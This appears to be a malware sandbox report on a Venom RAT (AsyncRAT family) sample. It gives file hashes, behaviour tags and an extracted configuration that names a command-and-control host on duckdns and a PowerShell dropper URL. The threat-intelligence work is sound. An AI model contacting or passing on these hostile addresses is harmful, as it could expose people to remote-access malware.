General

  • Target

    JaffaCakes118_1ae61cdab60648d667193e685b440256e0f96485269a01701c63ab5bcbcc4308

  • Size

    121KB

  • Sample

    241224-lqytcsvjam

  • MD5

    5e47326c7bd6ed925778368b4af67303

  • SHA1

    dc182f9e8572bdc875f7c45f6eb65d0eaaf9dabd

  • SHA256

    1ae61cdab60648d667193e685b440256e0f96485269a01701c63ab5bcbcc4308

  • SHA512

    671fae719294179f97e5d3df6705208871c1696798a18362864aac5aa40cafda1a36b4f9408753ee5f56be77ea90ddf405cde0a60aba1a4aaec0ec8062437144

  • SSDEEP

    3072:SfL8o1nfPjVW8EXyBhri6yOEFAXdnGwMWn9V0qTMU:CL8WfhwXiiT6nBMWjR1

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT 5.0.5

Botnet

Venom Clients

C2

ry8325585.duckdns.org:6087

Mutex

Venom_RAT_HVNC_Mutex_Venom RAT_HVNC

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://schoolcrypter.com/dll_startup

Targets

    • Target

      RVF001.EXE

    • Size

      300.0MB

    • MD5

      fdd6bb2ce995b36d49d3196894192988

    • SHA1

      9e8b9db35c796ccd6622771ffc5d333038d3333d

    • SHA256

      a09c85265ae57ce325328a06925d3fbc61021f2ca815d00858c3024ab6f8e3a8

    • SHA512

      e337f94b47930a8e01ef4877a45578c9e1bf430111a6c27de03f50cee599717e4c0605f01f41d70b2123ef3bf12fb695893965876cd90ac4a17746dc8b7389e2

    • SSDEEP

      3072:9q1IYuRXuhcSOY/hQ6d1XmRsDvHt02pWJJ67rmvHszvTBFUa:UyY6TYC6d1XjxpWJmryHszvTBFZ

    • AsyncRat

      AsyncRAT is designed to remotely monitor and control other computers written in C#.

    • Asyncrat family

    • Executes dropped EXE

    • Uses the VBS compiler for execution

    • Suspicious use of SetThreadContext

    • Target

      RVF002.VBS

    • Size

      236KB

    • MD5

      7b474b087d336f766ba4cd74067e2786

    • SHA1

      aac3de5ebd60465dabdd78033637819b68d1e91b

    • SHA256

      92d4a215bc6adc95dec27c087a23e307dcebd79b2abcbb76f9f9dc08a70b3e5a

    • SHA512

      e431562d6a08d91075c8498dd88de3c83a7e21bf627263254f3b62e9f9b5493a34f1f942412865e3bd4bc3bcfc4ff2c8f5223aa0fa58601803d1f43451f50dfe

    • SSDEEP

      24:QnODOUWlHllyjOMyE2aL8gVEuMvywFfV7N9Riwnwm43YQ7FYiVLneMDTFv9vPvWE:yKVWtl6OeqyYLQeMHNOSAgHyLKhB

    Score
    10/10
    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Command and Scripting Interpreter: PowerShell

      Using powershell.exe command.

MITRE ATT&CK Enterprise v15

Tasks